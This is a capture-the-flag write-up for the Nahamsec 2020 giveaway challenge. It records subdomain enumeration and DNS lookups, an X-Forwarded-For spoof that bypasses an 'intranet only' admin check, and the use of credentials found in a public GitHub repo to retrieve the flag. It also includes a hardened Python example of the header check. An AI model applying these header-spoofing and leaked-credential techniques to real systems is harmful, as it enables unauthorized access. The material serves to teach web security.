Image: https://nahamsec.net/Nahamsec_CTF_Giveaway.jpg
No useful metadata:
date:create: 2020-01-12T11:09:18+00:00
date:modify: 2020-01-07T00:53:58+00:00
Domain nahamsec.net
Wayback url:
http://nahamsec.net
http://nahamsec.net/robots.txt
Wayback captures of robots.txt from 12/11/2017 and 20/11/2017:
User-agent: *
Disallow: /click
Not available anymore:
HTTP/1.1 404 Not Found
CF-Cache-Status: DYNAMIC
CF-RAY: 553eb562df27cddf-CDG
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 12 Jan 2020 11:14:44 GMT
Server: cloudflare
Set-Cookie: __cfduid=d598acd883d84a67d7afb12e3e596a97c1578827684; expires=Tue, 11-Feb-20 11:14:44 GMT; path=/; domain=.nahamsec.net; HttpOnly; SameSite=Lax
Transfer-Encoding: chunked
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at nahamsec.net Port 80</address>
</body></html>
Looks like the Wayback Machine is a dead end in this case.
Nothing in the Google Cache and no results indexed by Google.
Simple HTTP GET on the root:
HTTP/1.1 200 OK
CF-Cache-Status: DYNAMIC
CF-RAY: 553ebd593a48eddf-CDG
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Sun, 12 Jan 2020 11:20:10 GMT
Last-Modified: Tue, 07 Jan 2020 19:53:09 GMT
Server: cloudflare
Set-Cookie: __cfduid=d38c1e3268c86c483ae0b67d66ae6d9f91578828010; expires=Tue, 11-Feb-20 11:20:10 GMT; path=/; domain=.nahamsec.net; HttpOnly; SameSite=Lax
Transfer-Encoding: chunked
Vary: Accept-Encoding
<html><title>Welcome To Nahamsec Giveaway CTF</title>
<style>
html,body{
margin:0;
height:100%;
}
img{
display:block;
width:100%; height:100%;
object-fit: cover;
}
</style>
<body>
<img src="Nahamsec_CTF_Giveaway.jpg"></img>
</body>
</html>
The website is behind Cloudflare; maybe we can find the real IP.
Censys request for Nahamsec:
- https://censys.io/ipv4/134.209.1.150/table#443 (recond.dev, probably not part of this CTF).
Running Subfinder:
20.nahamsec.net
nahamsec.net
www.nahamsec.net
30kftw.nahamsec.net
api-admin.nahamsec.net
api-dev.nahamsec.net
http get http://30kftw.nahamsec.net/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 66
Content-Type: text/html
Date: Mon, 13 Jan 2020 09:05:37 GMT
ETag: "42-59ba507421ab2"
Keep-Alive: timeout=5, max=100
Last-Modified: Wed, 08 Jan 2020 18:26:17 GMT
Server: Apache/2.4.29 (Ubuntu)
Welcome to Admin Site, Admin area only allowed from our intranet!
Dig:
dig any 30kftw.nahamsec.net
30kftw.nahamsec.net. A 167.99.107.11
dig any api-admin.nahamsec.net
api-admin.nahamsec.net. A 167.99.107.11
dig any api-dev.nahamsec.net
api-dev.nahamsec.net. A 104.27.166.50
api-dev.nahamsec.net. A 104.27.167.50
api-dev.nahamsec.net. MX 12 167.99.107.11.
After a few tries, the "intranet only" check turns out to trust the X-Forwarded-For header:
http get http://30kftw.nahamsec.net/admin/ X-Forwarded-For:127.0.0.1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 86
Content-Type: text/html
Date: Mon, 13 Jan 2020 09:40:11 GMT
ETag: "49-59ba51a64f2a5-gzip"
Keep-Alive: timeout=5, max=100
Last-Modified: Wed, 08 Jan 2020 18:31:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Oh!, looks like we have moved our api services to api-admin.nahamsec.net
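The intranet check that the spoofed header defeated, written out as an added example (not code from the CTF or this write-up): the weak resolver trusts whatever X-Forwarded-For the client sends, while the hardened one only honours the header when the TCP peer is a proxy the operator runs. The INTRANET ranges and the TRUSTED_PROXIES address are assumed values.

```python
import ipaddress
from typing import Callable, Mapping

# Assumed values for this example: what the admin site considers "intranet",
# and the single reverse proxy allowed to set X-Forwarded-For for it.
INTRANET = [ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("10.0.0.0/8")]
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}


def is_intranet(ip: str) -> bool:
    """True when ip falls inside one of the INTRANET ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTRANET)


def client_ip_weak(remote_addr: str, headers: Mapping[str, str]) -> str:
    """The pattern the write-up bypassed: the first X-Forwarded-For entry is
    believed unconditionally, so the sender chooses its own source address."""
    return headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()


def client_ip_hardened(remote_addr: str, headers: Mapping[str, str]) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a proxy we operate.
    That proxy appends the address it saw, so the last entry is the real peer;
    anything earlier in the list was supplied by the client and is ignored."""
    if ipaddress.ip_address(remote_addr) not in TRUSTED_PROXIES:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    return hops[-1] if hops else remote_addr


def admin_allowed(remote_addr: str, headers: Mapping[str, str],
                  resolver: Callable[[str, Mapping[str, str]], str] = client_ip_hardened) -> bool:
    """Access decision for /admin/ with the chosen resolver; a malformed
    address in the header is treated as not-intranet rather than crashing."""
    try:
        return is_intranet(resolver(remote_addr, headers))
    except ValueError:
        return False
```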
After some brute-forcing:
http get http://api-admin.nahamsec.net/swagger.json
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 823
Content-Type: application/json
Date: Mon, 13 Jan 2020 10:13:55 GMT
Keep-Alive: timeout=5, max=100
Server: gunicorn/19.10.0
{
"basePath": "/",
"consumes": [
"application/json"
],
"info": {
"description": "Oh boy, everyone is talking about WW3 and you still hacking? even our developer was in rush that he left the credentials somewhere!",
"title": "Get_Flag API",
"version": "0.1"
},
"paths": {
"/api/getflag": {
"post": {
"operationId": "post_hello_world",
"responses": {
"200": {
"description": "Success"
}
},
"tags": [
"nahamsecCTF2020"
]
}
},
"/api/tokens": {
"get": {
"operationId": "get_hello_world",
"responses": {
"200": {
"description": "Success"
}
},
"tags": [
"nahamsecCTF2020"
]
}
}
},
"produces": [
"application/json"
],
"responses": {
"MaskError": {
"description": "When any error occurs on mask"
},
"ParseError": {
"description": "When a mask can't be parsed"
}
},
"swagger": "2.0",
"tags": [
{
"description": "Updates to be pulled soon!",
"name": "nahamsecCTF2020"
}
]
}
Searching nahamsec.net in Github led to this: https://github.com/garagosy/nahamsecCTF2020/blob/master/api.py
from flask import Flask
from flask_restplus import Api  # imports added here; the Api(...) keywords below match Flask-RESTPlus

app = Flask(__name__)
api = Api(app, version='0.1', title='Get_Flag API', default='nahamsecCTF2020', default_label='updates to ve pulled soon!',
description='Oh boy, everyone is talking about WW3 and you still hacking? even our developer was in rush that he left the credentials somewhere!')
# this is damn old repo. Credentials used are
'''
username: BugHunters
password: 4dawin
'''
http get http://api-admin.nahamsec.net/api/getflag -a BugHunters:4dawin
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 74
Content-Type: application/json
Date: Mon, 13 Jan 2020 10:48:29 GMT
Keep-Alive: timeout=5, max=100
Server: gunicorn/19.10.0
{
"Flag_is": "You are such a guru!, send this to [email protected]"
}